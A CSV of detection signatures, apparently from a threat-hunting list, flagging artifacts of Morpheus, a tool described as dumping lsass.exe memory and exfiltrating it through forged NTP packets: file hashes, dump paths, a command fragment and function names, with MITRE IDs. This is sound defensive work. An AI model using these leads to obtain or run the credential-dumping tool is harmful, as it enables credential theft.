"*126e1149940a288389cee23653f889ad5edadc77c5944d6700229dfd573e5327*",".{0,1000}126e1149940a288389cee23653f889ad5edadc77c5944d6700229dfd573e5327.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#filehash","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63767"
"*ad8d2c8c861bc21e5768c4509027b36ae269f30b38efaeb9a1f990c0257479b2*",".{0,1000}ad8d2c8c861bc21e5768c4509027b36ae269f30b38efaeb9a1f990c0257479b2.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#filehash","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63768"
"*ec45956c13d4f7e2eb4af57ad7ccdb8ff8ac14d0e524e2f676fdec002cc8bf79*",".{0,1000}ec45956c13d4f7e2eb4af57ad7ccdb8ff8ac14d0e524e2f676fdec002cc8bf79.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#filehash","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63769"
"*a05b50e5814778371a6e565e659997211603dcb723bffd14eae9027ca7f557c3*",".{0,1000}a05b50e5814778371a6e565e659997211603dcb723bffd14eae9027ca7f557c3.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#filehash","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63770"
"*\temp\*\dumpfile_*.dmp*",".{0,1000}\\temp\\.{0,1000}\\dumpfile_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63771"
"*--best memdump.exe*",".{0,1000}\-\-best\smemdump\.exe.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63772"
"*function Obfuscate-Executable*",".{0,1000}function\sObfuscate\-Executable.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#content","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63773"
"*\dump_memory.bin*",".{0,1000}\\dump_memory\.bin.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63774"